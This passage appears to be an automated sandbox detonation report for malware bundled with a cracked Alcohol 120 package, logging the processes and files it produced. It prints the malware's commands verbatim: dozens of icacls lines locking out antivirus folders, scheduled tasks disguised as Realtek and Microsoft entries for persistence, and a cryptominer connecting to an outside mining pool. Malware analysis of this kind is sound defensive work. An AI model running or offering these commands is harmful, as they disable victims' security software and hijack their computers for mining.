C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny Admin:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny Admin:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST

C:\ProgramData\RealtekHD\taskhostw.exe

C:\ProgramData\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhost.exe

C:\Programdata\RealtekHD\taskhost.exe

C:\Programdata\WindowsTask\winlogon.exe

C:\Programdata\WindowsTask\winlogon.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /C schtasks /query /fo list

C:\Windows\SysWOW64\schtasks.exe

schtasks /query /fo list

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ipconfig /flushdns

C:\Windows\system32\ipconfig.exe

ipconfig /flushdns

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c gpupdate /force

C:\Windows\system32\gpupdate.exe

gpupdate /force

C:\ProgramData\WindowsTask\MicrosoftHost.exe

C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://185.139.69.167:3333 -u RandomX_CPU --donate-level=1 -k -t4

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

Network

Files

C:\ProgramData\Setup\update.exe

C:\Users\Admin\AppData\Local\Temp\aut6A92.tmp

C:\Program Files\Common Files\System\iediagcmd.exe

C:\ProgramData\RealtekHD\taskhostw.exe

C:\programdata\microsoft\temp\H.bat

C:\Windows\System32\drivers\etc\hosts

C:\ProgramData\RealtekHD\taskhost.exe

C:\Users\Admin\AppData\Local\Temp\aut5A9E.tmp

C:\ProgramData\WindowsTask\MicrosoftHost.exe

C:\ProgramData\WindowsTask\WinRing0x64.sys

Analysis: behavioral10

Detonation Overview

Submitted 2024-06-01 03:28

Reported 2024-06-01 03:31

Platform win10v2004-20240426-en

Max time kernel 147s

Max time network 154s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-25.12.2011\MSIMG32.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4568 wrote to memory of 3652 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-25.12.2011\MSIMG32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-25.12.2011\MSIMG32.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3652 -ip 3652

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 668

Network

Files

N/A